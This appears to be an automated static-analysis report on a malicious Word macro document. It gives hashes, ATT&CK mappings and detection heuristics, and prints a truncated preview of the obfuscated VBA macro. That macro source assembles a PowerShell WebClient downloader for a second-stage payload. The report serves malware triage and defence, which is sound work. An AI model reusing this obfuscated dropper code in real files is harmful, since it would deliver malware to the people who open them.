Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a77e40b03e814c6f…

MALICIOUS

Office (OLE)

Size: 241.0 KB
Created: 2017-12-31 08:51:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: 1ef18a696db0a4bd8ef98ee74797a268
SHA-1: 56ffeb3383f9bfef0773bbe6dd5d6d6a71887469
SHA-256: a77e40b03e814c6f554929a939839416d80f73228a123ab953be37a1f25780b5
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes the Shell() function, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure' further supports this analysis, suggesting a lure used to deliver malicious content.

Heuristics (8)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 80336 bytes
SHA-256: 7e77356e2e915cf67af740ec088aa3d2c8015915d21f227dcc4d17cb3048c307
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SNTwjEnGXRiTn"
Function tIZpqwIrwK()
On Error Resume Next
wrwRW = (ARuhhjibNztik - Rnd(43 * Tan(LJaPqfTROvwSZk)) / qbNkJOYd * Oct(QijCrlVbGjNHj) * wWWjDzjPHtPXW / Oct(tbfmjizLwRa - Chr(250) + 581 - ChrB(aWLpXEKnPNm)) - 389 + ViJBXpmTOqi)
kJvroT = (FuuknmEiNpu - Rnd(43 * Tan(jQKMYbm)) / zHQrwnXOGnr * Oct(oFLbwSkJBiAN) * tzWzLFK / Oct(JdziDnz - Chr(250) + 581 - ChrB(qYawLNdEi)) - 389 + GrdYRGDpC)
taHhjhni = (GMNDwvhmHXdlpk) + Mid("PmZuftAJ+HmRXs0z7Xs0+Xs0huasXs0+Xs0 = S4MwY1Y2cwObnoTrNz3", 9, 31)
RPkjEnzuOCV = (DabwnmaEJZY - Rnd(43 * Tan(DRWLNiQf)) / ARBYwoHfGOkoh * Oct(wcLzcnhVvFzz) * SbGfZCpD / Oct(ZZpwSZCK - Chr(250) + 581 - ChrB(XWiaiBinsHiVw)) - 389 + AhpEzjKmrjm)
vmaIQhNbG = (ZtzEPwpbzua - Rnd(43 * Tan(FCLdHVjhduNFP)) / jHWSdFiolm * Oct(EZJSsovj) * ztTinFMfwffu / Oct(tPiFfRVKRRZUC - Chr(250) + 581 - ChrB(WPkGSYhXmnniYs)) - 389 + qFGPQft)
TkDEKS = (ZbbrsFwlJ - Rnd(43 * Tan(YodzoQdVDbik)) / vofPYJXzLkf * Oct(YFzLumY) * JKwYoVNrnQJ / Oct(pzfDMqXcmiND - Chr(250) + 581 - ChrB(vPLjJIoFHUlpHa)) - 389 + wfMvatM)
nizrjqAz = (mKiVITl) + Mid("rdYABzPFJUj39-rEPlACE  ([cH'+'Ar]83+[cHAr]122+[cHAr]55),[cHAr]36) SEv& ( Av0Env:cOmSPEc[4,26,25]-JoinXs0Xs'+'0)HmR).RePLace(HmRAv0HmR,HmROMiHmR).RePLace(HmRSEvHmR,[sTRING'+'][CHAR]124)VQP7auE7nZDFkCnwajwzn", 12, 173)
DVALwJtapRl = (nIiLXfcuOlIq - Rnd(43 * Tan(NYNVGWduR)) / scGaLSE * Oct(QcfzznMJsJtZ) * PCncjttJJQpVH / Oct(jRERbJwrNlQb - Chr(250) + 581 - ChrB(IwdTArHdaS)) - 389 + iZLdHMpbqCdsns)
jzikYi = (EJUInvsvD - Rnd(43 * Tan(wMMqTuUfBKfZT)) / wizotzhWXDKnDw * Oct(qCvrjLzzjz) * TowzkipYK / Oct(zECELboJ - Chr(250) + 581 - ChrB(fqYLKHkhkjA)) - 389 + RofftYYTjzfl)
dCPjCcjYVYz = (fwpdzHIw - Rnd(43 * Tan(nCwVkBv)) / lXfEqbibNGmQm * Oct(FaQcPzwquU) * jEPSZmmGWUwFIo / Oct(GCmBWhTOwY - Chr(250) + 581 - ChrB(HlvrvcK)) - 389 + KWSInTzJ)
jwPrwiv = (QuXoCLFTl) + Mid("HSvMFPzR3brlJEB5lSr0hrbZO2ranXs0+Xs'+'0dXs0+Xs0om;SXs0+XsHmR'+'+HmR0z7Xs0+Xs0bcd =HmR+HmR XHmR+HmRs0+Xs0KXs0+'+'Xs00K01", 27, 90)
pSZtYKNmE = (twsnXjJo - Rnd(43 * Tan(TXudorz)) / FoJdfPXYSDPpzh * Oct(mARJrtMA) * sPVHlPkhTisqb / Oct(NiVPFftwBlLH - Chr(250) + 581 - ChrB(WhHDtoSkQuP)) - 389 + CTiVQpVLUDaW)
TYjCnDIljh = (MrjjflMSKKih - Rnd(43 * Tan(CMwcijmuj)) / FjbWJjWEYr * Oct(tkiTYki) * CKqrVITaw / Oct(ipofTdzEPDmoF - Chr(250) + 581 - ChrB(qJJcQJJ)) - 389 + DciNPpFNpFZPuB)
vUBiLX = (fwBJwzoF - Rnd(43 * Tan(DMKclvqwITH)) / ZnTUqCLTJOGj * Oct(lrTBXGmQ) * CInRcnF / Oct(ftsaFLhpFvcm - Chr(250) + 581 - ChrB(oFbSzEWukN)) - 389 + UYkLjZZYNc)
ptUSZEWr = (GUwtOjwdnNz) + Mid("Avr77iTas0+Xs0lit(K0Xs0+Xs0Q,K0Q);Sz7Xs0+Xs0ka'+'rXs0+Xs0apXs0+XsHmR'+'+HmR0asXs0+Xs0 = SzXs0+Xs07nsaXs0+XHmR+HmRs0'+'daXs0+Xs0sd.next(1, 3HmR+HmRXs0+XaBTDpVf", 9, 143)
aifDT = (NQFTUVffN - Rnd(43 * Tan(lBMzqKm)) / fmMBFOKwBNj * Oct(qKotwLLpp) * XwRJdotOzvm / Oct(PPDLLqJVUSzw - Chr(250) + 581 - ChrB(aMTCizzpC)) - 389 + QkwkWFmOl)
cRMhjwj = (OoRhhzWqBV - Rnd(43 * Tan(qLMscaWlwA)) / HzjloAP * Oct(AaGzVGijsJWZ) * vzRYIVhjMu / Oct(XNjSzwKW - Chr(250) + 581 - ChrB(PUvkLrmztdc)) - 389 + biMBSNjihF)
riZzB = (SuDbaMUvptMAnb - Rnd(43 * Tan(FmPhENWHf)) / dRiiQVuJSRBhu * Oct(atpmMjYCJkO) * EbBjwnYowupQY / Oct(RrUKOYsjGK - Chr(250) + 581 - ChrB(juvOaItPXQ)) - 389 + HjVNJGijE)
ouMHDK = (GvZpkAUjUIF) + Mid("w70PNMapJb3iEsp4R5ZsmR+HmRXs0t SyXs0+Xs0stem.NetXs0+Xs0.WXs0+Xs0ebCHmR+HmRlient;Sz7nXs8Kc", 21, 66)
VSKqnFz = (fwbHZMjwzAwGb - Rnd(43 * Tan(jMQijmj)) / iwiUQijir * Oct(KfPmkkNlJjdYc) * kzlBPwwSFN / Oct(fYEvENVIF - Chr(250) + 581 - ChrB(vmubjUwdCoJTKk)) - 389 + thOvuraCX)
Bssaw = (iLbchGRDCkFlG - Rnd(43 * Tan(SPnkQaJzUWV)) / YqtwnXMVi * Oct(zwcQJrNRrU) * AFHItiEhkqEHSi / Oct(KFwhZkuwRqI - Chr(250) + 581 - ChrB(QSjDfAP)) - 389 + klousHozcs)
viYaru = (boMrZjbApC - Rnd(43 * Tan(FLOUdLfGNK)) / VkXXVLH * Oct(jjtvivEBIf) * uCYdRtzoM / Oct(nBDNXTcUCOQsRT - Chr(250) + 5
... (truncated)